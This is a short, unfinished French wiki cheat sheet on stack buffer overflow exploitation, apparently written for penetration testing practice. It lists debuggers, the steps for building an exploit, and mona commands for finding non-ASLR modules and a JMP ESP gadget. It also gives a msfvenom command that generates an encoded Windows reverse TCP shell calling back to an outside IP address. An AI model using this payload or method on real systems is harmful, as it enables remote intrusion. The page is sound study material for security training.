Buffer Overflow
En cours de rédaction
Cette page est incomplête ou nécessite d'être rédigée. N'hésitez pas à proposer votre contribution sur ce sujet.
Debuggers:
- Linux : gdb, edb
- Windows : OllyDbg
Méthodologie
- Chercher un overflow
- Identifier l’écrasement d’EIP avec des outils tels que msf-pattern_create et msf-pattern_offset
- Chercher les caractères interdits dans le buffer
- Identifier un ROP si les adresses sont randomisées
- Créer un “first stage” avec msf-nasm_shell si le shellcode ne passe pas
- Créer un shellcode avec msfvenom (en excluant les caractères interdits)
- Créer l’exploit avec un nop sled en amont du shellcode
MSFVenom Payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.230 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x1a\x0a\x0d\x25\x26\x2b\x3d"
Mona
Search for no ASLR, etc : !mona modules
Search for a ROP : !mona find -s "\xff\xe4" -m "MSA2Mutility03.dll"